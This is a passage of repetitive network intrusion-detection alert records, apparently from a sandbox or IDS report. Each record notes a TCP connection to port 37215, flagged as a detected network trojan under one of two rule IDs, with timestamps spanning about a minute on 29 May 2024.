                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.715648
                SID:2829579
                Source Port:42578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359185
                SID:2835222
                Source Port:56756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141258
                SID:2829579
                Source Port:57644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666363
                SID:2829579
                Source Port:40236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.046098
                SID:2835222
                Source Port:41576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224440
                SID:2835222
                Source Port:53648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652857
                SID:2835222
                Source Port:33588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223900
                SID:2835222
                Source Port:45868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517785
                SID:2835222
                Source Port:49480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.824454
                SID:2829579
                Source Port:40258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189671
                SID:2835222
                Source Port:33952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336588
                SID:2829579
                Source Port:45682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597898
                SID:2835222
                Source Port:59778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009265
                SID:2829579
                Source Port:34184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987033
                SID:2835222
                Source Port:54638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.413608
                SID:2829579
                Source Port:35714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914236
                SID:2829579
                Source Port:55734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211957
                SID:2829579
                Source Port:45334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842255
                SID:2835222
                Source Port:55066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518400
                SID:2829579
                Source Port:40378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.856022
                SID:2835222
                Source Port:58394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035251
                SID:2835222
                Source Port:45118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662627
                SID:2835222
                Source Port:45282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.242196
                SID:2835222
                Source Port:50258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237303
                SID:2835222
                Source Port:35134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900599
                SID:2829579
                Source Port:49536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076402
                SID:2835222
                Source Port:55394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418862
                SID:2835222
                Source Port:57228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499856
                SID:2835222
                Source Port:41592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.880799
                SID:2835222
                Source Port:36342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618782
                SID:2829579
                Source Port:36828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509301
                SID:2835222
                Source Port:40616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111675
                SID:2835222
                Source Port:51258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174811
                SID:2835222
                Source Port:43560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517704
                SID:2835222
                Source Port:55458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983750
                SID:2829579
                Source Port:39170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860184
                SID:2835222
                Source Port:52284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877305
                SID:2829579
                Source Port:42264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.183016
                SID:2829579
                Source Port:49748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959224
                SID:2835222
                Source Port:37022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837373
                SID:2835222
                Source Port:55228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212824
                SID:2835222
                Source Port:40302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287026
                SID:2835222
                Source Port:60358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571090
                SID:2835222
                Source Port:35302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326098
                SID:2835222
                Source Port:43852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981703
                SID:2835222
                Source Port:36274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375039
                SID:2835222
                Source Port:39604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.568328
                SID:2829579
                Source Port:33084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416060
                SID:2829579
                Source Port:55940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422124
                SID:2835222
                Source Port:50832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166353
                SID:2829579
                Source Port:51588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228515
                SID:2835222
                Source Port:46430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786847
                SID:2829579
                Source Port:52114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.244063
                SID:2835222
                Source Port:48198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161245
                SID:2829579
                Source Port:34286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238797
                SID:2835222
                Source Port:32830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843362
                SID:2835222
                Source Port:43278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855751
                SID:2835222
                Source Port:45928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611034
                SID:2829579
                Source Port:45020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844339
                SID:2835222
                Source Port:57686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535246
                SID:2835222
                Source Port:34594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861929
                SID:2835222
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502499
                SID:2835222
                Source Port:48928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281627
                SID:2835222
                Source Port:45016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239550
                SID:2835222
                Source Port:48818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237675
                SID:2835222
                Source Port:53974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559833
                SID:2835222
                Source Port:54710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832739
                SID:2835222
                Source Port:44262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784836
                SID:2829579
                Source Port:50168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422270
                SID:2835222
                Source Port:33194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813430
                SID:2829579
                Source Port:52688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584824
                SID:2835222
                Source Port:32972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211938
                SID:2829579
                Source Port:40874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013743
                SID:2829579
                Source Port:37034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.907566
                SID:2835222
                Source Port:40550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994661
                SID:2829579
                Source Port:45812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945903
                SID:2829579
                Source Port:56774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165726
                SID:2835222
                Source Port:33056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240475
                SID:2835222
                Source Port:51328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945635
                SID:2829579
                Source Port:35156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883922
                SID:2829579
                Source Port:56900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284537
                SID:2835222
                Source Port:45716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559114
                SID:2835222
                Source Port:55990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232140
                SID:2829579
                Source Port:55858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209287
                SID:2829579
                Source Port:46380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942600
                SID:2829579
                Source Port:52502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653101
                SID:2829579
                Source Port:47626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.732759
                SID:2835222
                Source Port:35818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329558
                SID:2835222
                Source Port:46512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463402
                SID:2835222
                Source Port:38374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711324
                SID:2835222
                Source Port:33302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228208
                SID:2829579
                Source Port:34100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908089
                SID:2829579
                Source Port:59498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520241
                SID:2829579
                Source Port:59988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163338
                SID:2835222
                Source Port:51518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228022
                SID:2835222
                Source Port:50674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272407
                SID:2829579
                Source Port:42864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281652
                SID:2829579
                Source Port:60284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266708
                SID:2835222
                Source Port:40760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466589
                SID:2829579
                Source Port:38180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785451
                SID:2835222
                Source Port:53074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335155
                SID:2829579
                Source Port:35990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177263
                SID:2835222
                Source Port:48714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154501
                SID:2835222
                Source Port:33114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737239
                SID:2829579
                Source Port:35674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261521
                SID:2829579
                Source Port:51310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948905
                SID:2829579
                Source Port:51278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901059
                SID:2829579
                Source Port:56216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421773
                SID:2835222
                Source Port:36274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843569
                SID:2835222
                Source Port:38488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872940
                SID:2829579
                Source Port:51450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174841
                SID:2829579
                Source Port:44046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207707
                SID:2829579
                Source Port:34922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959557
                SID:2835222
                Source Port:42046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.842537
                SID:2835222
                Source Port:48264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276743
                SID:2835222
                Source Port:33746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583264
                SID:2835222
                Source Port:50726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813505
                SID:2829579
                Source Port:48478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878817
                SID:2829579
                Source Port:53474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965702
                SID:2835222
                Source Port:41066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175444
                SID:2835222
                Source Port:43860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434163
                SID:2835222
                Source Port:42618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.718024
                SID:2835222
                Source Port:58666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464517
                SID:2829579
                Source Port:59108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169383
                SID:2835222
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287716
                SID:2829579
                Source Port:59770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336399
                SID:2835222
                Source Port:57886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978100
                SID:2835222
                Source Port:38150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728701
                SID:2835222
                Source Port:42964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975902
                SID:2835222
                Source Port:57016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363222
                SID:2829579
                Source Port:46326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681586
                SID:2829579
                Source Port:57480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727219
                SID:2835222
                Source Port:43042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013781
                SID:2829579
                Source Port:39726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654524
                SID:2829579
                Source Port:43720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217971
                SID:2829579
                Source Port:36782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980036
                SID:2829579
                Source Port:34642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.094947
                SID:2829579
                Source Port:58228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324262
                SID:2835222
                Source Port:46462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464838
                SID:2835222
                Source Port:58006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023450
                SID:2829579
                Source Port:39338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387135
                SID:2829579
                Source Port:47616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743622
                SID:2829579
                Source Port:49952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612391
                SID:2829579
                Source Port:59220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985366
                SID:2829579
                Source Port:42938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687868
                SID:2835222
                Source Port:39834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687218
                SID:2829579
                Source Port:58626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631517
                SID:2835222
                Source Port:51880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816317
                SID:2829579
                Source Port:57488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226788
                SID:2835222
                Source Port:41386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730709
                SID:2835222
                Source Port:47214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286925
                SID:2835222
                Source Port:59164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929219
                SID:2835222
                Source Port:49068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864024
                SID:2829579
                Source Port:34152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908427
                SID:2835222
                Source Port:43850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.998184
                SID:2835222
                Source Port:33370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441947
                SID:2829579
                Source Port:60288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325400
                SID:2835222
                Source Port:48418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931862
                SID:2829579
                Source Port:48820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808641
                SID:2835222
                Source Port:56330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110778
                SID:2829579
                Source Port:53686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.268384
                SID:2835222
                Source Port:38966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629720
                SID:2829579
                Source Port:38274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713799
                SID:2835222
                Source Port:59782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903053
                SID:2829579
                Source Port:48042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272601
                SID:2835222
                Source Port:41596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091282
                SID:2835222
                Source Port:36980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837859
                SID:2829579
                Source Port:47940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852941
                SID:2829579
                Source Port:56582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287895
                SID:2835222
                Source Port:50358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654143
                SID:2835222
                Source Port:37892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278527
                SID:2829579
                Source Port:34738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169128
                SID:2829579
                Source Port:35166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101462
                SID:2829579
                Source Port:48580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.237081
                SID:2835222
                Source Port:55548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165088
                SID:2829579
                Source Port:45220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175089
                SID:2835222
                Source Port:59790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908115
                SID:2835222
                Source Port:43828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620285
                SID:2829579
                Source Port:58434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896330
                SID:2835222
                Source Port:36496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844186
                SID:2829579
                Source Port:45798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687801
                SID:2829579
                Source Port:36484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418377
                SID:2829579
                Source Port:35766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008676
                SID:2835222
                Source Port:39910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597814
                SID:2835222
                Source Port:52390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968586
                SID:2835222
                Source Port:39048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870243
                SID:2829579
                Source Port:40306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593739
                SID:2835222
                Source Port:54704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966834
                SID:2829579
                Source Port:34638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228394
                SID:2835222
                Source Port:41704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617431
                SID:2829579
                Source Port:41204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899346
                SID:2829579
                Source Port:50032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227073
                SID:2829579
                Source Port:35990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263968
                SID:2829579
                Source Port:48966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.705934
                SID:2829579
                Source Port:48718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032395
                SID:2829579
                Source Port:55332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962749
                SID:2835222
                Source Port:54848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
